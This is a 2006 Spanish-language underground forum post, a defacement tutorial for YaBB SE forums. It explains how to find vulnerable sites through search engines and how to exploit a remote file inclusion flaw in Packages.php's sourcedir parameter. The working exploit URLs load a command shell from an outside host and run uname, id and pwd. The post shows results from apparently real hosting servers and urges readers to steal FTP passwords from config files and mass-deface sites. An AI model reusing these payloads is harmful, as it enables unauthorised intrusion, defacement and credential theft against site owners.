Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - ſeptiembre 07, 2008, 08:42:33
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Deface en Yabbse Forums 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Deface en Yabbse Forums  (Leído 273 veces)
[QuetZaL]
Colaborador
*****
Desconectado Desconectado

Mensajes: 401



Ver Perfil Email
« en: Marzo 16, 2006, 12:29:35 »

    *############################################################

    Deface en Yabbse Forums by Status-x [ phr4xz @gmail.com ]


               
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

    #############################################################



    \ Introduccion /

    -------------------------------------------------------------

    Dos tutoriales casi seguidos Wink hehehehe espero que les

    ayude bastante esta tecnica es poco usada debido a que es algo

    vieja y a que es algo dificil encontrar sitios que sean

    no vulnerables a la inyeccion sino a poder hacerles un deface Tongue

    por favor no cambie creditos y distribuyan los textos tanto

    como puedan Wink Gracias


    \ Buscando Victimas /

    -------------------------------------------------------------

    Para buscar victimas recomiendo usar todos los buscadores que

    sepan usar y en criterio de busqueda pongan lo siguiente:


    YaBBi SE v1.1


    Y haber que les resulta, tambien pueden buscar por foros yabbse

    tengo entendido que otras versiones tambien son vulnerables

    asi que no se desanimen Smiley


    \ Explorando Bug /

    -------------------------------------------------------------

    El fallo se encuentra en los archivos del directorio Sources

    en la variable $sourcedir, asi que ahora veamos lo que denomi

    naremos a partir de hoy como string Wink



    #########################################################################
   
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
    Packages.php?sourcedir=http://derf.hpgvip.com.br/newcmd.gif?&
    cmd=uname%20-a;pwd;id
    #########################################################################


    Y nos mostrara nuevamente los datos del servidor, veamos un

    ejemplo real:


    #########################################################################
   
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
    Packages.php?sourcedir=http://derf.hpgvip.com.br/newcmd.gif?&
    cmd=id;%20uname%20-a;%20pwd
    #########################################################################


    Y otro mas para que no digan que luego nada mas pongo un ejemplo


    #########################################################################
   
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
    Packages.php?sourcedir=http://derf.hpgvip.com.br/newcmd.gif?&
    cmd=uname -a;pwd;id
    #########################################################################

    En el primero me da este resultado:

    ############################################################
    uid=32004(kremlin) gid=32004(kremlin) groups=32004(kremlin)
    Linux legolas.maxiwebhosting.com 2.4.20-28.9 #1 Thu Dec 18
     13:46:42 EST 2003 i686 athlon i386 GNU/Linux
    /home/kremlin/public_html/yabbse/Sources
    ############################################################

    Vemos que es vulnerable a un deface en el index y a un mass defacement

    y tambien podemos ver el Settings.php o Config.php del foro Smiley

    y sacar el password del FTP Smiley


    En el Segundo solo vemos que es vulnerable a un Mass Wink ojala y les sirvan

    para practicar:

    ###########################################################
    uid=99(nobody) gid=99(nobody) groups=99(nobody)
    Linux venus.dnshostplan.com 2.4.20-28.8 #1 Thu Dec 18
    12:53:39 EST 2003 i686 i686 i386 GNU/Linux
    /home/ambr98/public_html/forum/yabbse/Sources
    ###########################################################


    Wink Saludos a toda la banda de mexico


    \ * Despedida * /

    -----------------------------------------------------------

    Un tutorial mas jejeje, que espero ayude a todos ustedes Wink

    como lo anuncie en el foro proximamente una sorpresa en el

    sitio que espero que les guste mucho

    Recuerden promocionar la web para que cada dia crezca mas Smiley

    atte: Status-x

    Mail: phr4xz @gmail.com


   
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

    ###########################################################

    Copyright 2005 - Defacers Mexico 2005 - phr4xz @gmail.com

               
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

    ###########################################################



    Autor: Status-x

En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Deface en Yabbse Forums « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC